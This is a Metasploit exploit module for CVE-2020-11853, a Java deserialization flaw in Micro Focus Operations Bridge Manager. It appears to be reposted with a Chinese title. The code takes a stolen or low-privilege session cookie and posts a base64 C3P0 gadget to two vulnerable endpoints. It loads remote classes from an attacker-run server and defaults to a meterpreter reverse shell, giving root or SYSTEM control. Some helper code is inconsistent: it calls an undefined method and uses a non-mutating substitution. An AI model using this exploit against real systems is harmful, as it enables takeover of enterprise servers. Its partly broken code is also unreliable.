# CVE-2020-11853 Micro Focus Operations Bridge Manager 遠程命令執行漏洞
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::Java::HTTP::ClassLoader prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Micro Focus Operations Bridge Manager Authenticated Remote Code Execution', 'Description' => %q{ This module exploits an authenticated Java deserialization that affects a truckload of Micro Focus products: Operations Bridge Manager, Application Performance Management, Data Center Automation, Universal CMDB, Hybrid Cloud Management and Service Management Automation. However this module was only tested on Operations Bridge Manager. Exploiting this vulnerability will result in remote code execution as the root user on Linux or the SYSTEM user on Windows. Authentication is required, the module user needs to login to the application and obtain the authenticated LWSSO_COOKIE_KEY, which should be fed to the module. Any authenticated user can exploit this vulnerability, even the lowest privileged ones. For more information refer to the advisory link below. }, 'Author' => [ 'Pedro Ribeiro', # Vulnerability discovery and Metasploit module ], 'References' => [ [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md'], [ 'CVE', '2020-11853'], [ 'ZDI', '20-1327'], ], 'DisclosureDate' => '2020-10-28', 'License' => MSF_LICENSE, 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Privileged' => true, 'Targets' => [ ['Micro Focus Operations Bridge Manager <= 2020.05 (and many other MF products)', {}] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'java/meterpreter/reverse_tcp' } ) ) register_options([ Opt::RPORT(443), OptString.new('TARGETURI', [true, 'Base path', '/']), OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]), OptString.new('LWSSO_COOKIE_KEY', [true, 'Authenticated LWSSO_COOKIE_KEY session cookie']) ]) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/topaz/login.jsp') }) # unfortunately could not find an easy way to detect the version running, even when auth if res && res.code == 200 && res.body.include?('Login - Operations Bridge Manager') return Exploit::CheckCode::Detected end return Exploit::CheckCode::Unknown end def exploit # Start our HTTP server to provide remote classloading @classloader_uri = start_service unless @classloader_uri fail_with(Failure::BadConfig, 'Could not start remote classloader server') end print_good("Started remote classloader server at #{@classloader_uri}") # heh, we got two of these, let's pick one randomly! vuln_uri = [ '/legacy/topaz/sitescope/conf/registration', '/legacy/topaz/sitescope/conf/download' ].sample # Send our remote classloader gadget to the target, triggering the vuln send_request_gadget( normalize_uri(target_uri.path, vuln_uri) ) end # Convenience method to send our gadget to a URI def send_request_gadget(uri) print_status("Sending remote classloader gadget to #{full_uri(uri)}") send_request_raw({ 'method' => 'POST', 'uri' => uri, 'cookie' => "LWSSO_COOKIE_KEY=#{datastore['LWSSO_COOKIE_KEY']}", 'headers' => { 'Content-Type' => 'application/octet-stream' }, 'data' => go_go_gadget }, 0) end # C3P0 payload generated with a ysoserial jar # The ysoserial jar needs to be built with c3p0 version as that is what the target uses # See the advisory for details. # # java -jar ysoserial-0.0.6-SNAPSHOT-all-c3p0- C3P0 'http://whatever/:ExploitClass' | base64 def go_go_gadget gadget = Rex::Text.decode_base64( <<~EOF rO0ABXNyAChjb20ubWNoYW5nZS52Mi5jM3AwLlBvb2xCYWNrZWREYXRhU291cmNlZoRH/BzETxgC AAB4cgA1Y29tLm1jaGFuZ2UudjIuYzNwMC5pbXBsLkFic3RyYWN0UG9vbEJhY2tlZERhdGFTb3Vy Y2UAAAAAAAAAAQMAAHhyADFjb20ubWNoYW5nZS52Mi5jM3AwLmltcGwuUG9vbEJhY2tlZERhdGFT b3VyY2VCYXNlAAAAAAAAAAEDAAdJABBudW1IZWxwZXJUaHJlYWRzTAAYY29ubmVjdGlvblBvb2xE YXRhU291cmNldAAkTGphdmF4L3NxbC9Db25uZWN0aW9uUG9vbERhdGFTb3VyY2U7TAAOZGF0YVNv dXJjZU5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABRmYWN0b3J5Q2xhc3NMb2NhdGlvbnEAfgAE TAANaWRlbnRpdHlUb2tlbnEAfgAETAADcGNzdAAiTGphdmEvYmVhbnMvUHJvcGVydHlDaGFuZ2VT dXBwb3J0O0wAA3Zjc3QAIkxqYXZhL2JlYW5zL1ZldG9hYmxlQ2hhbmdlU3VwcG9ydDt4cHcCAAFz cgA9Y29tLm1jaGFuZ2UudjIubmFtaW5nLlJlZmVyZW5jZUluZGlyZWN0b3IkUmVmZXJlbmNlU2Vy aWFsaXplZGIZhdDRKsITAgAETAALY29udGV4dE5hbWV0ABNMamF2YXgvbmFtaW5nL05hbWU7TAAD ZW52dAAVTGphdmEvdXRpbC9IYXNodGFibGU7TAAEbmFtZXEAfgAJTAAJcmVmZXJlbmNldAAYTGph dmF4L25hbWluZy9SZWZlcmVuY2U7eHBwcHBzcgAWamF2YXgubmFtaW5nLlJlZmVyZW5jZejGnqKo 6Y0JAgAETAAFYWRkcnN0ABJMamF2YS91dGlsL1ZlY3RvcjtMAAxjbGFzc0ZhY3RvcnlxAH4ABEwA FGNsYXNzRmFjdG9yeUxvY2F0aW9ucQB+AARMAAljbGFzc05hbWVxAH4ABHhwc3IAEGphdmEudXRp bC5WZWN0b3LZl31bgDuvAQMAA0kAEWNhcGFjaXR5SW5jcmVtZW50SQAMZWxlbWVudENvdW50WwAL ZWxlbWVudERhdGF0ABNbTGphdmEvbGFuZy9PYmplY3Q7eHAAAAAAAAAAAHVyABNbTGphdmEubGFu Zy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAApwcHBwcHBwcHBweHQADEV4cGxvaXRDbGFzc3QAEGh0 dHA6Ly93aGF0ZXZlci90AAdleHBsb2l0cHBwdwQAAAAAeHcCAAF4 EOF ) # Replace length-prefixed placeholder strings with our own gadget.sub!("\x00\x10http://whatever/", packed_classloader_uri) gadget.sub!("\x00\x07exploit", packed_class_name) gadget.sub("\x00\x0cExploitClass", packed_class_name) end # Convenience method to pack the classloader URI as a length-prefixed string def packed_classloader_uri "#{[@classloader_uri.length].pack('n')}#{@classloader_uri}" end end
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